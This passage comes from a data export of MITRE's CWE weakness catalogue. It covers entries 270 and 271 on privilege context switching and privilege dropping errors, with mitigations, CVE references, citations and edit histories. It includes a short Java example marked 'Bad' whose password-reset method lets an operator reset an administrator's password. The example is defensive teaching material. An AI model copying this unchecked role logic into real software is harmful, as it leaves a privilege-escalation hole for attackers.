"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2019-09-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Research_Gaps",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "269",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code allows someone with the role of \"ADMIN\" or \"OPERATOR\" to reset a user's password. The role of \"OPERATOR\" is intended to have less privileges than an \"ADMIN\", but still be able to help users with small issues such as forgotten passwords.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tpublic enum Roles {\n\t\tADMIN,OPERATOR,USER,GUEST\n\t}\n\tpublic void resetPassword(User requestingUser, User user, String password ){\n\t\t\tif(isAuthenticated(requestingUser)){\n\t\t\t\t\tswitch(requestingUser.role){\n\t\t\t\t\t\t\tcase GUEST:\n\t\t\t\t\t\t\t\tSystem.out.println(\"You are not authorized to perform this command\");\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase USER:\n\t\t\t\t\t\t\t\tSystem.out.println(\"You are not authorized to perform this command\");\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t\tsetPassword(user,password);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\telse{\n\t\t\t\tSystem.out.println(\"You must be logged in to perform this command\");\n\t\t\t}\n\t}\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-128"
}
] | null | null |
High
| null | 1
|
[
[
"284",
"269",
"268"
]
] |
[] |
270
|
Privilege Context Switching Error
|
Base
|
Simple
|
Draft
|
The product does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "A user can assume the identity of another user with separate privileges in another context. This will give the user unauthorized access that may allow them to acquire the access information of other users.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-17",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": "Environment Hardening"
},
{
"Description": "Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-49",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "Web browser cross domain problem when user hits \"back\" button.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1688",
"Reference": "CVE-2002-1688"
},
{
"Description": "Web browser cross domain problem when user hits \"back\" button.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2003-1026",
"Reference": "CVE-2003-1026"
},
{
"Description": "Cross-domain issue - third party product passes code to web browser, which executes it in unsafe zone.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1770",
"Reference": "CVE-2002-1770"
},
{
"Description": "Run callback in different security context after it has been changed from untrusted to trusted. * note that \"context switch before actions are completed\" is one type of problem that happens frequently, espec. in browsers.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2263",
"Reference": "CVE-2005-2263"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Privilege Context Switching Error",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] |
[
"17",
"30",
"35"
] |
[
{
"Authors": [
"Michael Howard",
"David LeBlanc"
],
"Edition": "2nd Edition",
"ExternalReferenceID": "REF-7",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "12",
"PublicationYear": "2002",
"Publisher": "Microsoft Press",
"Section": "Chapter 7, \"Running with Least Privilege\" Page 207",
"Title": "Writing Secure Code",
"URL": "https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223",
"URLDate": null
},
{
"Authors": [
"Sean Barnum",
"Michael Gegick"
],
"Edition": null,
"ExternalReferenceID": "REF-76",
"Publication": null,
"PublicationDay": "14",
"PublicationMonth": "09",
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "Least Privilege",
"URL": "https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege",
"URLDate": "2023-04-07"
}
] |
[
{
"Note": "This concept needs more study.",
"Type": "Research Gap"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2014-02-18",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "269",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"269",
"270"
]
] |
[] |
271
|
Privilege Dropping / Lowering Errors
|
Class
|
Simple
|
Incomplete
|
The product does not drop privileges before passing control of a resource to an actor that does not have those privileges.
|
In some contexts, a system executing with elevated permissions will hand off a process/file/etc. to another process or user. If the privileges of an entity are not reduced, then elevated privileges are spread throughout a system and possibly to an attacker.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped.",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity",
"Hide Activities"
],
"Likelihood": null,
"Note": "If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator.",
"Scope": [
"Access Control",
"Non-Repudiation"
]
}
] |
[
{
"Description": "\n\nCompartmentalize the system to have \"safe\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.\n\n\nEnsure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-46",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
},
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-49",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "Program does not drop privileges after acquiring the raw socket.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2000-1213",
"Reference": "CVE-2000-1213"
},
{
"Description": "Setuid program does not drop privileges after a parsing error occurs, then calls another program to handle the error.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-0559",
"Reference": "CVE-2001-0559"
},
{
"Description": "Does not drop privileges in related groups when lowering privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-0787",
"Reference": "CVE-2001-0787"
},
{
"Description": "Does not drop privileges in related groups when lowering privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-0080",
"Reference": "CVE-2002-0080"
},
{
"Description": "Does not drop privileges before determining access to certain files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1029",
"Reference": "CVE-2001-1029"
},
{
"Description": "Finger daemon does not drop privileges when executing programs on behalf of the user being fingered.",
"Link": "https://www.cve.org/CVERecord?id=CVE-1999-0813",
"Reference": "CVE-1999-0813"
},
{
"Description": "FTP server does not drop privileges if a connection is aborted during file transfer.",
"Link": "https://www.cve.org/CVERecord?id=CVE-1999-1326",
"Reference": "CVE-1999-1326"
},
{
"Description": "Program only uses seteuid to drop privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2000-0172",
"Reference": "CVE-2000-0172"
},
{
"Description": "Windows program running as SYSTEM does not drop privileges before executing other programs (many others like this, especially involving the Help facility).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-2504",
"Reference": "CVE-2004-2504"
},
{
"Description": "Utility Manager launches winhlp32.exe while running with raised privileges, which allows local users to gain system privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-0213",
"Reference": "CVE-2004-0213"
},
{
"Description": "Setuid program does not drop privileges before executing program specified in an environment variable.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-0806",
"Reference": "CVE-2004-0806"
},
{
"Description": "Setuid program does not drop privileges before processing file specified on command line.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-0828",
"Reference": "CVE-2004-0828"
},
{
"Description": "Service on Windows does not drop privileges before using \"view file\" option, allowing code execution.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-2070",
"Reference": "CVE-2004-2070"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Privilege Dropping / Lowering Errors",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null |
[
{
"Authors": [
"Michael Howard",
"David LeBlanc",
"John Viega"
],
"Edition": null,
"ExternalReferenceID": "REF-44",
"Publication": "McGraw-Hill",
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2010",
"Publisher": null,
"Section": "\"Sin 16: Executing Code With Too Much Privilege.\" Page 243",
"Title": "24 Deadly Sins of Software Security",
"URL": null,
"URLDate": null
},
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 9, \"Dropping Privileges Permanently\", Page 479",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
}
] |
[
{
"Note": "CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Maintenance_Notes",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
